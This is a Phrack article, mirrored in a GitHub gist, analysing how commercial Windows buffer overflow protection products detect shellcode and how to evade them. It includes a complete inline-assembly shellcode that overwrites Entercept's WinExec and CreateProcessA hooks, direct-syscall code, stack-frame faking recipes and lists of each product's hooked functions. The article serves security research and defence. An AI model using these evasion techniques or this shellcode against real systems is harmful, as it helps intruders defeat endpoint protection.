-
-
Save bopin2020/9c21f356ca37ad3d59be5eebc98d8987 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File: archives/62/p62_0x05_Bypassing Win BO Protection_by_jamie butler & anonymous author.txt | |
==Phrack Inc.== | |
Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10 | |
|=-----------------------------------------------------------------------=| | |
|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=| | |
|=-----------------------------------------------------------------------=| | |
|=--------------=[ anonymous <p62_wbo_a@author.phrack.org ]=-------------=| | |
|=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=| | |
|=--------------=[ anonymous <p62_wbo_b@author.phrack.org ]=-------------=| | |
--[ Contents | |
1 - Introduction | |
2 - Stack Backtracing | |
3 - Evading Kernel Hooks | |
3.1 - Kernel Stack Backtracing | |
3.2 - Faking Stack Frames | |
4 - Evading Userland Hooks | |
4.1 - Implementation Problems - Incomplete API Hooking | |
4.1.1 - Not Hooking all API Versions | |
4.1.2 - Not Hooking Deeply Enough | |
4.1.3 - Not Hooking Thoroughly Enough | |
4.2 - Fun With Trampolines | |
4.2.1 Patch Table Jumping | |
4.2.2 Hook Hopping | |
4.3 - Repatching Win32 APIs | |
4.4 - Attacking Userland Components | |
4.4.1 IAT Patching | |
4.4.2 Data Section Patching | |
4.5 - Calling Syscalls Directly | |
4.6 - Faking Stack Frames | |
5 - Conclusions | |
--[ 1 - Introduction | |
Recently, a number of commercial security systems started to offer | |
protection against buffer overflows. This paper analyzes the protection | |
claims and describes several techniques to bypass the buffer overflow | |
protection. | |
Existing commercial systems implement a number of techniques to protect | |
against buffer overflows. Currently, stack backtracing is the most popular | |
one. It is also the easiest to implement and the easiest to bypass. | |
Several commercial products such as Entercept (now NAI Entercept) and | |
Okena (now Cisco Security Agent) implement this technique. | |
--[ 2 - Stack Backtracing | |
Most of the existing commercial security systems do not actually prevent | |
buffer overflows but rather try to attempt to detect the execution of | |
shellcode. | |
The most common technology used to detect shellcode is code page | |
permission checking which involves checking whether code is executing on | |
a writable page of memory. This is necessary since architectures such as | |
x86 do not support the non-executable memory bit. | |
Some systems also perform additional checking to see whether code's page | |
of memory belongs to a memory mapped file section and not to an anonymous | |
memory section. | |
[-----------------------------------------------------------] | |
page = get_page_from_addr( code_addr ); | |
if (page->permissions & WRITABLE) | |
return BUFFER_OVERFLOW; | |
ret = page_originates_from_file( page ); | |
if (ret != TRUE) | |
return BUFFER_OVERFLOW; | |
[-----------------------------------------------------------] | |
Pseudo code for code page permission checking | |
Buffer overflow protection technologies (BOPT) that rely on stack | |
backtracing don't actually create non-executable heap and stack segments. | |
Instead they hook the OS and check for shellcode execution during the | |
hooked API calls. | |
Most operating systems can be hooked in userland or in kernel. | |
Next section deals with evading kernel hooks, while section 4 deals with | |
bypassing userland hooks. | |
--[ 3 - Evading Kernel Hooks | |
When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must | |
be able to detect where a userland API call originated. Due to | |
the heavy use of kernel32.dll and ntdll.dll libraries, an API call is | |
usually several stack frames away from the actual syscall trap call. | |
For this reason, some intrusion preventions systems rely on using stack | |
backtracing to locate the original caller of a system call. | |
----[ 3.1 - Kernel Stack Backtracing | |
While stack backtracing can occur from either userland or kernel, it is | |
far more important for the kernel components of a BOPT than its userland | |
components. The existing commercial BOPT's kernel components rely entirely | |
on stack backtracing to detect shellcode execution. Therefore, evading a | |
kernel hook is simply a matter of defeating the stack backtracing | |
mechanism. | |
Stack backtracing involves traversing stack frames and verifying that the | |
return addresses pass the buffer overflow detection tests described above. | |
Frequently, there is also an additional "return into libc" check, which | |
involves checking that a return address points to an instruction | |
immediately following a call or a jump. The basic operation of stack | |
backtracing code, as used by a BOPT, is presented below. | |
[-----------------------------------------------------------] | |
while (is_valid_frame_pointer( ebp )) { | |
ret_addr = get_ret_addr( ebp ); | |
if (check_code_page(ret_addr) == BUFFER_OVERFLOW) | |
return BUFFER_OVERFLOW; | |
if (does_not_follow_call_or_jmp_opcode(ret_addr)) | |
return BUFFER_OVERFLOW; | |
ebp = get_next_frame( ebp ); | |
} | |
[-----------------------------------------------------------] | |
Pseudo code for BOPT stack backtracing | |
When discussing how to evade stack backtracing, it is important to | |
understand how stack backtracing works on an x86 architecture. A typical | |
stack frame looks as follows during a function call: | |
: : | |
|-------------------------| | |
| function B parameter #2 | | |
|-------------------------| | |
| function B parameter #1 | | |
|-------------------------| | |
| return EIP address | | |
|-------------------------| | |
| saved EBP | | |
|=========================| | |
| function A parameter #2 | | |
|-------------------------| | |
| function A parameter #1 | | |
|-------------------------| | |
| return EIP address | | |
|-------------------------| | |
| saved EBP | | |
|-------------------------| | |
: : | |
The EBP register points to the next stack frame. Without the EBP register | |
it is very hard, if not impossible, to correctly identify and trace | |
through all the stack frames. | |
Modern compilers often omit the use of EBP as a frame pointer and use it | |
as a general purpose register instead. With an EBP optimization, a stack | |
frame looks as follows during a function call: | |
|-----------------------| | |
| function parameter #2 | | |
|-----------------------| | |
| function parameter #1 | | |
|-----------------------| | |
| return EIP address | | |
|-----------------------| | |
Notice that the EBP register is not present on the stack. Without an EBP | |
register it is not possible for the buffer overflow detection technologies | |
to accurately perform stack backtracing. This makes their task incredibly | |
hard as a simple return into libc style attack will bypass the protection. | |
Simply originating an API call one layer higher than the BOPT hook defeats | |
the detection technique. | |
----[ 3.2 - Faking Stack Frames | |
Since the stack is under complete control of the shellcode, it is possible | |
to completely alter its contents prior to an API call. Specially crafted | |
stack frames can be used to bypass the buffer overflow detectors. | |
As was explained previously, the buffer overflow detector is looking for | |
three key indicators of legitimate code: read-only page permissions, | |
memory mapped file section and a return address pointing to an instruction | |
immediately following a call or jmp. Since function pointers change | |
calling semantics, BOPT do not (and cannot) check that a call or jmp | |
actually points to the API being called. Most importantly, the BOPT cannot | |
check return addresses beyond the last valid EBP frame pointer | |
(it cannot stack backtrace any further). | |
Evading a BOPT is therefore simply a matter of creating a "final" stack | |
frame which has a valid return address. This valid return address must | |
point to an instruction residing in a read-only memory mapped file section | |
and immediately following a call or jmp. Provided that the dummy return | |
address is reasonably close to a second return address, the shellcode can | |
easily regain control. | |
The ideal instruction sequence to point the dummy return address to is: | |
[-----------------------------------------------------------] | |
jmp [eax] ; or call [eax], or another register | |
dummy_return: ... ; some number of nops or easily | |
; reversed instructions, e.g. inc eax | |
ret ; any return will do, e.g. ret 8 | |
[-----------------------------------------------------------] | |
Bypassing kernel BOPT components is easy because they must rely on user | |
controlled data (the stack) to determine the validity of an API call. By | |
correctly manipulating the stack, it is possible to prematurely terminate | |
the stack return address analysis. | |
This stack backtracing evasion technique is also effective against | |
userland hooks (see section 4.6). | |
--[ 4 - Evading Userland Hooks | |
Given the presence of the correct instruction sequence in a valid region | |
of memory, it is possible to trivially bypass kernel buffer overflow | |
protection techniques. Similar techniques can be used to bypass userland | |
BOPT components. In addition, since the shellcode executes with the same | |
permissions as the userland hooks, a number of other techniques can be | |
used to evade the detection. | |
----[ 4.1 - Implementation Problems - Incomplete API Hooking | |
There are many problems with the userland based buffer overflow protection | |
technologies. For example, they require the buffer overflow protection | |
code to be in the code path of all attacker's calls or the shellcode | |
execution will go undetected. | |
Trying to determine what an attacker will do with his or her shellcode | |
a priori is an extremely hard problem, if not an impossible one. Getting | |
on the right path is not easy. Some of the obstacles in the way include: | |
a. Not accounting for both UNICODE and ANSI versions of a Win32 API | |
call. | |
b. Not following the chaining nature of API calls. For example, | |
many functions in kernel32.dll are nothing more than wrappers for | |
other functions within kernel32.dll or ntdll.dll. | |
c. The constantly changing nature of the Microsoft Windows API. | |
--------[ 4.1.1 - Not Hooking All API Versions | |
A commonly encountered mistake with userland API hooking | |
implementations is incomplete code path coverage. In order for an API | |
interception based products to be effective, all APIs utilized by | |
attackers must be hooked. This requires the buffer overflow protection | |
technology to hook somewhere along the code path an attacker _has_ to | |
take. However, as will be shown, once an attacker has begun executing | |
code, it becomes very difficult for third party systems to cover all | |
code paths. Indeed, no tested commercial buffer overflow detector actually | |
provided an effective code path coverage. | |
Many Windows API functions have two versions: ANSI and UNICODE. The ANSI | |
function names usually end in A, and UNICODE functions end in W because | |
of their wide character nature. The ANSI functions are often nothing | |
more than wrappers that call the UNICODE version of the API. For example, | |
CreateFileA takes the ANSI file name that was passed as a parameter and | |
turns it into an UNICODE string. It then calls CreateFileW. Unless a | |
vendor hooks both the UNICODE and ANSI version of the API function, an | |
attacker can bypass the protection mechanism by simply calling the other | |
version of the function. | |
For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt | |
to intercept LoadLibraryW. If a protection mechanism was only going to | |
hook one version of a function, it would make more sense to hook the | |
UNICODE version. For this particular function, Okena/CSA does a better | |
job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and | |
LoadLibraryExW. Unfortunately for the third party buffer overflow | |
detectors, simply hooking more functions in kernel32.dll is not enough. | |
--------[ 4.1.2 - Not Hooking Deeply Enough | |
In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many | |
buffer overflow detection products do not hook functions within ntdll.dll. | |
This simple error is similar to not hooking both the UNICODE and ANSI | |
versions of a function. An attacker can simply call the ntdll.dll directly | |
and completely bypass all the kernel32.dll "checkpoints" established by a | |
buffer overflow detector. | |
For example, NAI Entercept tries to detect shellcode calling | |
GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten | |
to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the | |
same goal, and at the same time never pass through the NAI Entercept hook. | |
Similarly, shellcode can completely bypass userland hooks altogether and | |
make system calls directly (see section 4.5). | |
--------[ 4.1.3 - Not Hooking Thoroughly Enough | |
The interactions between the various different Win32 API functions is | |
byzantine, complex and difficult to understand. A vendor must make only | |
one mistake in order to create a window of opportunity for an attacker. | |
For example, Okena/CSA and NAI Entercept both hook WinExec trying to | |
prevent attacker's shellcode from spawning a process. | |
The call path for WinExec looks like this: | |
WinExec() --> CreateProcessA() --> CreateProcessInternalA() | |
Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() | |
(see Appendix A and B). However, neither product hooks | |
CreateProcessInternalA() (exported by kernel32.dll). When writing a | |
shellcode, an attacker could find the export for | |
CreateProcessInternalA() and use it instead of calling WinExec(). | |
CreateProcessA() pushes two NULLs onto the stack before calling | |
CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs | |
and then call CreateProcessInternalA() directly to evade the userland | |
API hooks of both products. | |
As new DLLs and APIs are released, the complexity of Win32 API internal | |
interactions increases, making the problem worse. Third party product | |
vendors are at a severe disadvantage when implementing their buffer | |
overflow detection technologies and are bound to make mistakes which | |
can be exploited by attackers. | |
----[ 4.2 - Fun With Trampolines | |
Most Win32 API functions begin with a five byte preamble. First, EBP is | |
pushed onto the stack, then ESP is moved into EBP. | |
[-----------------------------------------------------------] | |
Code Bytes Assembly | |
55 push ebp | |
8bec mov ebp, esp | |
[-----------------------------------------------------------] | |
Both Okena/CSA and Entercept use inline function hooking. They overwrite | |
the first 5 bytes of a function with an immediate unconditional jump or | |
call. For example, this is what the first few bytes of WinExec() look like | |
after NAI Entercept's hooks have been installed: | |
[-----------------------------------------------------------] | |
Code Bytes Assembly | |
e8 xx xx xx xx call xxxxxxxx | |
54 push esp | |
53 push ebx | |
56 push esi | |
57 push edi | |
[-----------------------------------------------------------] | |
Alternatively, the first few bytes could be overwritten with a jump | |
instruction: | |
[-----------------------------------------------------------] | |
Code Bytes Assembly | |
e9 xx xx xx xx jmp xxxxxxxx | |
... | |
[-----------------------------------------------------------] | |
Obviously, it is easy for shellcode to test for these and other signatures | |
before calling a function. If a hijacking mechanism is detected, the | |
shellcode can use several different techniques to bypass the hook. | |
------[ 4.2.1 - Patch Table Jumping | |
When an API is hooked, the original preamble is saved into a table so that | |
the buffer overflow detector can recreate the original API after | |
performing its validation checks. The preamble is stored in a patch table, | |
which resides somewhere in the address space of an application. When | |
shellcode detects the presence of an API hook, it can simply search for | |
the patch table and make its calls to patch table entries. This | |
completely avoids the hook, preventing the userland buffer overflow | |
detector components from ever being in the attacker's call path. | |
------[ 4.2.2 - Hook Hopping | |
Alternatively, instead of locating the patch table, shellcode can include | |
its own copy of the original pre-hook preamble. After executing its own | |
API preamble, the shellcode can transfer execution to immediately after | |
the API hook (function address plus five bytes). | |
Since Intel x86 has variable length instructions, one must take this into | |
account in order to land on an even instruction boundary: | |
[-----------------------------------------------------------] | |
Shellcode: | |
call WinExecPreamble | |
WinExecPreamble: | |
push ebp | |
mov ebp, esp | |
sub esp, 54 | |
jmp WinExec+6 | |
[-----------------------------------------------------------] | |
This technique will not work if another function within the call path | |
is also hooked. In this case, Entercept also hooks CreateProcessA(), | |
which WinExec() calls. Thus, to evade detection shellcode should call | |
CreateProcessA() using the stored copy of CreateProcessA's preamble. | |
----[ 4.3 - Repatching Win32 APIs | |
Thoroughly hooking Win32 APIs is not effective when certain fundamental | |
errors are made in the implementation of a userland buffer overflow | |
detection component. | |
Certain implementations (NAI Entercept) have a serious problem with the | |
way they perform their API hooking. In order to be able to overwrite | |
preambles of hooked functions, the code section for a DLL has to be made | |
writable. Entercept marks code sections of kernel32.dll and ntdll.dll as | |
writable in order to be able to modify their contents. However, Entercept | |
never resets the writable bit! | |
Due to this serious security flaw, it is possible for an attacker to | |
overwrite the API hook by re-injecting the original preamble code. For | |
the WinExec() and CreateProcessA() examples, this would require | |
overwriting the first 6 bytes (just to be instruction aligned) of | |
WinExec() and CreateProcessA() with the original preamble. | |
[-----------------------------------------------------------] | |
WinExecOverWrite: | |
Code Bytes Assembly | |
55 push ebp | |
8bec mov ebp, esp | |
83ec54 sub esp, 54 | |
CreateProcessAOverWrite: | |
Code Bytes Assembly | |
55 push ebp | |
8bec mov ebp, esp | |
ff752c push DWORD PTR [ebp+2c] | |
[-----------------------------------------------------------] | |
This technique will not work against properly implemented buffer overflow | |
detectors, however it is very effective against NAI Entercept. A complete | |
shellcode example which overwrites the NAI Entercept hooks is presented | |
below: | |
[-----------------------------------------------------------] | |
// This sample code overwrites the preamble of WinExec and | |
// CreateProcessA to avoid detection. The code then | |
// calls WinExec with a "calc.exe" parameter. | |
// The code demonstrates that by overwriting function | |
// preambles, it is able to evade Entercept and Okena/CSA | |
// buffer overflow protection. | |
_asm { | |
pusha | |
jmp JUMPSTART | |
START: | |
pop ebp | |
xor eax, eax | |
mov al, 0x30 | |
mov eax, fs:[eax]; | |
mov eax, [eax+0xc]; | |
// We now have the module_item for ntdll.dll | |
mov eax, [eax+0x1c] | |
// We now have the module_item for kernel32.dll | |
mov eax, [eax] | |
// Image base of kernel32.dll | |
mov eax, [eax+0x8] | |
movzx ebx, word ptr [eax+3ch] | |
// pe.oheader.directorydata[EXPORT=0] | |
mov esi, [eax+ebx+78h] | |
lea esi, [eax+esi+18h] | |
// EBX now has the base module address | |
mov ebx, eax | |
lodsd | |
// ECX now has the number of function names | |
mov ecx, eax | |
lodsd | |
add eax,ebx | |
// EDX has addresses of functions | |
mov edx,eax | |
lodsd | |
// EAX has address of names | |
add eax,ebx | |
// Save off the number of named functions | |
// for later | |
push ecx | |
// Save off the address of the functions | |
push edx | |
RESETEXPORTNAMETABLE: | |
xor edx, edx | |
INITSTRINGTABLE: | |
mov esi, ebp // Beginning of string table | |
inc esi | |
MOVETHROUGHTABLE: | |
mov edi, [eax+edx*4] | |
add edi, ebx // EBX has the process base address | |
xor ecx, ecx | |
mov cl, BYTE PTR [ebp] | |
test cl, cl | |
jz DONESTRINGSEARCH | |
STRINGSEARCH: // ESI points to the function string table | |
repe cmpsb | |
je Found | |
// The number of named functions is on the stack | |
cmp [esp+4], edx | |
je NOTFOUND | |
inc edx | |
jmp INITSTRINGTABLE | |
Found: | |
pop ecx | |
shl edx, 2 | |
add edx, ecx | |
mov edi, [edx] | |
add edi, ebx | |
push edi | |
push ecx | |
xor ecx, ecx | |
mov cl, BYTE PTR [ebp] | |
inc ecx | |
add ebp, ecx | |
jmp RESETEXPORTNAMETABLE | |
DONESTRINGSEARCH: | |
OverWriteCreateProcessA: | |
pop edi | |
pop edi | |
push 0x06 | |
pop ecx | |
inc esi | |
rep movsb | |
OverWriteWinExec: | |
pop edi | |
push edi | |
push 0x06 | |
pop ecx | |
inc esi | |
rep movsb | |
CallWinExec: | |
push 0x03 | |
push esi | |
call [esp+8] | |
NOTFOUND: | |
pop edx | |
STRINGEXIT: | |
pop ecx | |
popa; | |
jmp EXIT | |
JUMPSTART: | |
add esp, 0x1000 | |
call START | |
WINEXEC: | |
_emit 0x07 | |
_emit 'W' | |
_emit 'i' | |
_emit 'n' | |
_emit 'E' | |
_emit 'x' | |
_emit 'e' | |
_emit 'c' | |
CREATEPROCESSA: | |
_emit 0x0e | |
_emit 'C' | |
_emit 'r' | |
_emit 'e' | |
_emit 'a' | |
_emit 't' | |
_emit 'e' | |
_emit 'P' | |
_emit 'r' | |
_emit 'o' | |
_emit 'c' | |
_emit 'e' | |
_emit 's' | |
_emit 's' | |
_emit 'A' | |
ENDOFTABLE: | |
_emit 0x00 | |
WinExecOverWrite: | |
_emit 0x06 | |
_emit 0x55 | |
_emit 0x8b | |
_emit 0xec | |
_emit 0x83 | |
_emit 0xec | |
_emit 0x54 | |
CreateProcessAOverWrite: | |
_emit 0x06 | |
_emit 0x55 | |
_emit 0x8b | |
_emit 0xec | |
_emit 0xff | |
_emit 0x75 | |
_emit 0x2c | |
COMMAND: | |
_emit 'c' | |
_emit 'a' | |
_emit 'l' | |
_emit 'c' | |
_emit '.' | |
_emit 'e' | |
_emit 'x' | |
_emit 'e' | |
_emit 0x00 | |
EXIT: | |
_emit 0x90 | |
// Normally call ExitThread or something here | |
_emit 0x90 | |
} | |
[-----------------------------------------------------------] | |
----[ 4.4 - Attacking Userland Components | |
While evading the hooks and techniques used by userland buffer overflow | |
detector components is effective, there exist other mechanisms of | |
bypassing the detection. Because both the shellcode and the buffer | |
overflow detector are executing with the same privileges and in the same | |
address space, it is possible for shellcode to directly attack the | |
buffer overflow detector userland component. | |
Essentially, when attacking the buffer overflow detector userland | |
component the attacker is attempting to subvert the mechanism used to | |
perform the shellcode detection check. There are only two principle | |
techniques for shellcode validation checking. Either the data used for the | |
check is determined dynamically during each hooked API call, or the data | |
is gathered at process start up and then checked during each call. | |
In either case, it is possible for an attacker to subvert the process. | |
------[ 4.4.1 - IAT Patching | |
Rather than implementing their own versions of memory page information | |
functions, the commercial buffer overflow protection products simply use | |
the operating system APIs. In Windows NT, these are implemented in | |
ntdll.dll. These APIs will be imported into the userland component | |
(itself a DLL) via its PE Import Table. An attacker can patch vectors | |
within the import table to alter the location of an API to a function | |
supplied by the shellcode. By supplying the function used to do the | |
validation checking by the buffer overflow detector, it is trivial for | |
an attacker to evade detection. | |
------[ 4.4.2 - Data Section Patching | |
For various reasons, a buffer overflow detector might use a pre-built | |
list of page permissions within the address space. When this is the | |
case, altering the address of the VirtualQuery() API is not effective. | |
To subvert the buffer overflow detector, the shellcode has to locate and | |
modify the data table used by the return address validation routines. | |
This is a fairly straightforward, although application specific, technique | |
for subverting buffer overflow prevention technologies. | |
----[ 4.5 - Calling Syscalls Directly | |
As mentioned above, rather than using ntdll.dll APIs to make system | |
calls, it is possible for an attacker to create shellcode which makes | |
system call directly. While this technique is very effective against | |
userland components, it obviously cannot be used to bypass kernel based | |
buffer overflow detectors. | |
To take advantage of this technique you must understand what parameters a | |
kernel function uses. These may not always be the same as the parameters | |
required by the kernel32 or ntdll API versions. | |
Also, you must know the system call number of the function in question. | |
You can find this dynamically using a technique similar to the one to find | |
function addresses. Once you have the address of the ntdll.dll version of | |
the function you want to call, index into the function one byte and read | |
the following DWORD. This is the system call number in the system call | |
table for the function. This is a common trick used by rootkit developers. | |
Here is the pseudo code for calling NtReadFile system call directly: | |
... | |
xor eax, eax | |
// Optional Key | |
push eax | |
// Optional pointer to large integer with the file offset | |
push eax | |
push Length_of_Buffer | |
push Address_of_Buffer | |
// Before call make room for two DWORDs called the IoStatusBlock | |
push Address_of_IoStatusBlock | |
// Optional ApcContext | |
push eax | |
// Optional ApcRoutine | |
push eax | |
// Optional Event | |
push eax | |
// Required file handle | |
push hFile | |
// EAX must contain the system call number | |
mov eax, Found_Sys_Call_Num | |
// EDX needs the address of the userland stack | |
lea edx, [esp] | |
// Trap into the kernel | |
// (recent Windows NT versions use "sysenter" instead) | |
int 2e | |
----[ 4.6 - Faking Stack Frames | |
As described in section 3.2, kernel based stack backtracing can be | |
bypassed using fake frames. Same techniques works against userland based | |
detectors. | |
To bypass both userland and kernel backtracing, shellcode can create a | |
fake stack frame without the ebp register on stack. Since stack | |
backtracing relies on the presence of the ebp register to find the next | |
stack frame, fake frames can stop backtracing code from tracing past | |
the fake frame. | |
Of course, generating a fake stack frame is not going to work when the | |
EIP register still points to shellcode which resides in a writable | |
memory segment. To bypass the protection code, shellcode needs to use | |
an address that lies in a non-writable memory segment. This presents | |
a problem since shellcode needs a way to eventually regain control of | |
the execution. | |
The trick to regaining control is to proxy the return to shellcode | |
through a "ret" instruction which resides in a non-writable memory | |
segment. "ret" instruction can be found dynamically by searching memory | |
for a 0xC3 opcode. | |
Here is an illustration of a normal LoadLibrary("kernel32.dll") call | |
that originates from a writable memory segment: | |
push kernel32_string | |
call LoadLibrary | |
return_eip: | |
. | |
. | |
. | |
LoadLibrary: ; * see below for a stack illustration | |
. | |
. | |
. | |
ret ; return to stack-based return_eip | |
|------------------------------| | |
| address of "kernel32.dll" str| | |
|------------------------------| | |
| return address (return_eip) | | |
|------------------------------| | |
As explained before, the buffer overflow protection code executes before | |
LoadLibrary gets to run. Since the return address (return_eip) is in a | |
writable memory segment, the protection code logs the overflow | |
and terminates the process. | |
Next example illustrates 'proxy through a "ret" instruction' technique: | |
push return_eip | |
push kernel32_string | |
; fake "call LoadLibrary" call | |
push address_of_ret_instruction | |
jmp LoadLibrary | |
return_eip: | |
. | |
. | |
. | |
LoadLibrary: ; * see below for a stack illustration | |
. | |
. | |
. | |
ret ; return to non stack-based address_of_ret_instruction | |
address_of_ret_instruction: | |
. | |
. | |
. | |
ret ; return to stack-based return_eip | |
Once again, the buffer overflow protection code executes before | |
LoadLibrary gets to run. This time though, the stack is setup with a | |
return address pointing to a non-writable memory segment. In addition, | |
the ebp register is not present on stack thus the protection code cannot | |
perform stack backtracing and determine that the return address in the | |
next stack frame points to a writable segment. This allows the shellcode | |
to call LoadLibrary which returns to the "ret" instruction. In its turn, | |
the "ret" instruction pops the next return address off stack | |
(return_eip) and transfers control to it. | |
|------------------------------| | |
| return address (return_eip) | | |
|------------------------------| | |
| address of "kernel32.dll" str| | |
|------------------------------| | |
| address of "ret" instruction | | |
|------------------------------| | |
In addition, any number of arbitrary complex fake stack frames can be | |
setup to further confuse the protection code. | |
Here is an example of a fake frame that uses a "ret 8" instruction | |
instead of simple "ret": | |
|--------------------------------| | |
| return address | | |
|--------------------------------| | |
| address of "ret" instruction | <- fake frame 2 | |
|--------------------------------| | |
| any value | | |
|--------------------------------| | |
| address of "kernel32.dll" str | | |
|--------------------------------| | |
| address of "ret 8" instruction | <- fake frame 1 | |
|--------------------------------| | |
This causes an extra 32-bit value to be removed from stack, complicating | |
any kind of analysis even further. | |
--[ 5 - Conclusions | |
The majority of commercial security systems do not actually prevent | |
buffer overflows but rather detect the execution of shellcode. The most | |
common technology used to detect shellcode is code page permission | |
checking which relies on stack backtracing. | |
Stack backtracing involves traversing stack frames and verifying that | |
the return addresses do not originate from writable memory segments such | |
as stack or heap areas. | |
The paper presents a number of different ways to bypass both userland | |
and kernel based stack backtracing. These range from tampering with | |
function preambles to creating fake stack frames. | |
In conclusion, the majority of current buffer overflow protection | |
implementations are flawed, providing a false sense of security and | |
little real protection against determined attackers. | |
Appendix A: Entercept 4.1 Hooks | |
Entercept hooks a number of functions in userland and in the kernel. Here | |
is a list of the currently hooked functions as of Entercept 4.1. | |
User Land | |
msvcrt.dll | |
_creat | |
_read | |
_write | |
system | |
kernel32.dll | |
CreatePipe | |
CreateProcessA | |
GetProcAddress | |
GetStartupInfoA | |
LoadLibraryA | |
PeekNamedPipe | |
ReadFile | |
VirtualProtect | |
VirtualProtectEx | |
WinExec | |
WriteFile | |
advapi32.dll | |
RegOpenKeyA | |
rpcrt4.dll | |
NdrServerInitializeMarshall | |
user32.dll | |
ExitWindowsEx | |
ws2_32.dll | |
WPUCompleteOverlappedRequest | |
WSAAddressToStringA | |
WSACancelAsyncRequest | |
WSACloseEvent | |
WSAConnect | |
WSACreateEvent | |
WSADuplicateSocketA | |
WSAEnumNetworkEvents | |
WSAEventSelect | |
WSAGetServiceClassInfoA | |
WSCInstallNameSpace | |
wininet.dll | |
InternetSecurityProtocolToStringW | |
InternetSetCookieA | |
InternetSetOptionExA | |
lsasrv.dll | |
LsarLookupNames | |
LsarLookupSids2 | |
msv1_0.dll | |
Msv1_0ExportSubAuthenticationRoutine | |
Msv1_0SubAuthenticationPresent | |
Kernel | |
NtConnectPort | |
NtCreateProcess | |
NtCreateThread | |
NtCreateToken | |
NtCreateKey | |
NtDeleteKey | |
NtDeleteValueKey | |
NtEnumerateKey | |
NtEnumerateValueKey | |
NtLoadKey | |
NtLoadKey2 | |
NtQueryKey | |
NtQueryMultipleValueKey | |
NtQueryValueKey | |
NtReplaceKey | |
NtRestoreKey | |
NtSetValueKey | |
NtMakeTemporaryObject | |
NtSetContextThread | |
NtSetInformationProcess | |
NtSetSecurityObject | |
NtTerminateProcess | |
Appendix B: Okena/Cisco CSA 3.2 Hooks | |
Okena/CSA hooks many functions in userland but many less in the kernel. | |
A lot of the userland hooks are the same ones that Entercept hooks. | |
However, almost all of the functions Okena/CSA hooks in the kernel are | |
related to altering keys in the Windows registry. Okena/CSA does not | |
seem as concerned as Entercept about backtracing calls in the kernel. | |
This leads to an interesting vulnerability, left as an exercise to the | |
reader. | |
User Land | |
kernel32.dll | |
CreateProcessA | |
CreateProcessW | |
CreateRemoteThread | |
CreateThread | |
FreeLibrary | |
LoadLibraryA | |
LoadLibraryExA | |
LoadLibraryExW | |
LoadLibraryW | |
LoadModule | |
OpenProcess | |
VirtualProtect | |
VirtualProtectEx | |
WinExec | |
WriteProcessMemory | |
ole32.dll | |
CoFileTimeToDosDateTime | |
CoGetMalloc | |
CoGetStandardMarshal | |
CoGetState | |
CoResumeClassObjects | |
CreateObjrefMoniker | |
CreateStreamOnHGlobal | |
DllGetClassObject | |
StgSetTimes | |
StringFromCLSID | |
oleaut32.dll | |
LPSAFEARRAY_UserUnmarshal | |
urlmon.dll | |
CoInstall | |
Kernel | |
NtCreateKey | |
NtOpenKey | |
NtDeleteKey | |
NtDeleteValueKey | |
NtSetValueKey | |
NtOpenProcess | |
NtWriteVirtualMemory | |
|=[ EOF ]=---------------------------------------------------------------=| |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment